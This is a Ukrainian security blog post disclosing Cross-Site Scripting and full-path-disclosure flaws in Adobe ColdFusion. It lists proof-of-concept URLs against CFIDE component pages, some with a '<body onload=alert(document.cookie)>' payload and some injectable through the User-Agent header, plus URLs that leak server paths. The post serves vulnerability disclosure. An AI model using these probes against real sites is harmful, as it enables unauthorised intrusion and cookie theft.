Використання стандартних веб технологій (таких як HTML, CSS і JavaScript) для розробки доповнень, призводить до появи уразливостей в аддонах до браузерів, аналогічних тим, які ми зустрічаємо у веб додатах. Тому розробникам доповнень до браузерів (так само як і плагінів, таких як Flash та інші) слід краще слідкувати за безпекою власних програм.

25.06.2011

У червні, 18.06.2011, я знайшов Cross-Site Scripting та Full path disclosure уразливості в Adobe ColdFusion. Які я виявив на багатьох сайтах, що використовують ColdFusion. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Adobe ColdFusion.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

23.09.2011

XSS:

http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS через заголовок User-Agent)

http://site/CFIDE/probe.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/Application.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS через заголовок User-Agent)

http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS через заголовок User-Agent)

Full path disclosure:

http://site/CFIDE/probe.cfm
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm

Через componentdetail.cfm та cfcexplorer.cfc можна отримати FPD навіть при відключених дебаг повідомленнях на сервері.

Уразливі Adobe ColdFusion 7 та попередні версії до XSS, і Adobe ColdFusion 9 та попередні версії до FPD.